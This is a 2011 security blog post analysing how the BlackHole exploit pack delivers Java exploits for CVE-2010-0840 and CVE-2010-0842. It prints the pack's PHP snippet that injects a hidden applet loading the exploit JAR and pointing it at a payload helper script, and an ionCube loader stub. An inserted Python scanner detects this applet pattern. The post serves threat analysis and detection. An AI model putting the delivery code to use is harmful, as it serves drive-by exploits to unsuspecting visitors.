Monday, February 21, 2011

Java OBE + BlackHole - Dead Man Rising



The BlackHole exploit pack is showing a heavy increase in malware infections across the web. The interesting fact that BlackHole presents is the use of Java OBE (Open Business Engine) in spreading exploits and successfully loading the malicious executable on the victim machine.

What is OBE?
"OBE is a flexible, modular, standards-compliant Open Source Java workflow engine. It is fully J2EE compliant, and supports several J2EE application servers, operating systems and databases. It faithfully implements Workflow Management Coalition Open Standards (WfMC), to which it offers a variety of extensions and enhancements. OBE is equally suited to embedded or standalone deployment."

More details can be found here.

However, BlackHole is using a fully functional Java OBE Toolkit in order to exploit a plethora of systems. Our latest analysis reveals that Java OBE holds the maximum rate of successfully exploiting the targets. The BlackHole exploit pack shows this behavior, where the Java OBE Toolkit is devastating victim machines at a more rapid pace than any other exploit.

The exploits served by Java OBE are CVE-2010-0840 and CVE-2010-0842.

As stated by the Zero Day Initiative: "Authentication is not required to exploit this vulnerability. The specific flaw exists within the code responsible for ensuring proper privileged execution of methods. If an untrusted method in an applet attempts to call a method that requires privileges, Java will walk the call stack and for each entry verify that the method called is defined within a class that has that privilege."

The BlackHole exploit pack uses the following PHP code to link to the exploit (the leading "<" of each tag was lost in extraction and is restored here):

<?php
include_once 'config.php';
// Emit a hidden (0x1 pixel) applet whose archive is the exploit JAR.
echo '<Applet Code="ToolsDemo.class" archive="';
echo $config_url . '/exploits/Java-2010-0842.jar';
// The URL parameter tells the applet where to fetch the payload from.
echo '" width="0" Height="1">
<PARAM NAME="URL" VALUETYPE="ref" VALUE="';
echo $config_url . '/exploits/Java-2010-0842Helper.php';
echo '">
</applet>';
?>
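As an added defensive illustration (not code from the BlackHole pack or from the original post), the following Python scanner flags the applet markup the PHP above emits: a zero-size applet, an archive named after the CVE, and a URL parameter pointing at a server-side helper script. The sample markup and its hostname are constructed placeholders.

```python
import re
from html.parser import HTMLParser

# Constructed sample of the markup the PHP snippet above emits; hostname is a placeholder.
SAMPLE_HTML = (
    '<Applet Code="ToolsDemo.class" '
    'archive="http://example.invalid/exploits/Java-2010-0842.jar" width="0" Height="1">'
    '<PARAM NAME="URL" VALUETYPE="ref" VALUE="http://example.invalid/exploits/Java-2010-0842Helper.php">'
    '</applet>'
)

class AppletCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.applets, self._current = [], None

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag/attribute names, so "Applet" and "PARAM" match here.
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "applet":
            self._current = {"attrs": attrs, "params": {}}
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name", "").upper()] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet" and self._current is not None:
            self.applets.append(self._current)
            self._current = None

def _is_tiny(value):
    # A width/height of 0 or 1 pixel: an applet nobody is meant to see.
    return value.strip().isdigit() and int(value) <= 1

def suspicious_applets(html):
    """Return [{'archive': ..., 'reasons': [...]}] for applets matching the loader pattern."""
    parser = AppletCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for applet in parser.applets:
        attrs, params, reasons = applet["attrs"], applet["params"], []
        if _is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", "")):
            reasons.append("zero-size applet")
        if re.search(r"java-2010-08(40|42)", attrs.get("archive", ""), re.I):
            reasons.append("archive named after CVE-2010-0840/0842")
        if re.search(r"\.php(\?|$)", params.get("URL", ""), re.I):
            reasons.append("URL param points at a server-side helper script")
        if reasons:
            findings.append({"archive": attrs.get("archive", ""), "reasons": reasons})
    return findings
```

Run over fetched HTML of a suspect landing page, a benign applet with a normal size and no helper script yields no finding, while the loader pattern above yields all three reasons.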


The exploit is encoded with the PHP ionCube encoder, as shown by its loader stub below:

<?php //0035e
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='/ioncube/ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');$__oid=$__id=realpath(ini_get('extension_dir'));
$__here=dirname(__FILE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).
$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}@dl($__ln);}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo
('Site error: the file '.__FILE__.' requires the ionCube PHP Loader '.basename($__ln).' to be installed by the site administrator.');exit(199);
?>
This exploit can be found in the wild on the World Wide Web. During our analysis, exploit-specific stats were checked for the infected domain hosting the BlackHole exploit pack. The comparative ratio is presented below.



This scenario shows the ease of exploiting the Java open engine. Only the BlackHole exploit pack is analyzed here; what about other exploit packs? It seems that Java is becoming the preferred base for exploitation because of its platform-independent nature.